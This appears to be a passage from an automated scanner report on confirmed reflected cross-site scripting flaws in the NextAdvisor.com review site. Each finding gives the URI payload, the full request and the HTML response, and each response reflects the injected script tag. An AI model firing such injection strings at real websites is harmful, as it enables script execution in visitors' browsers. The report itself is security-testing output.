Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3544
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/aboutus.php'"--></style></script><script>netsparker(0x0003B9)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0003B9)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E" class='link_off'>About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> </tr></table> </div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /payday_loans_tx/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003BA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003BA)%3C/script%3E

/payday_loans_tx/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003BA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003BA)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/payday_loans_tx/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0003BA)</script>

Request

GET /payday_loans_tx/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003BA)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/payday_loans_tx/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:59:44 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6772
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", payday lender, loans, united states, CashNet USA, Cash Central, PayDayOne, Speedy Cash, Check 'n Go, MyPayDayLoan, PayDayMax" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/payday_loans_tx/'"--></style></script><script>netsparker(0x0003BA)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0003BA)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/payday_loans_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Payday Loan Reviews FAQ</h1> <p>Frequently Asked Questions about Payday Loan Reviews</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Payday Loan Reviews:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="payday_loans_tx"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914..
- /contactus.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003DA)%3C/script%3E

/contactus.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003DA)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/contactus.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003DA..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0003DA)</script>

Request

GET /contactus.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003DA)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:59:49 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3530
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/contactus.php'"--></style></script><script>netsparker(0x0003DA)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0003DA)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="aboutus.php">About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span 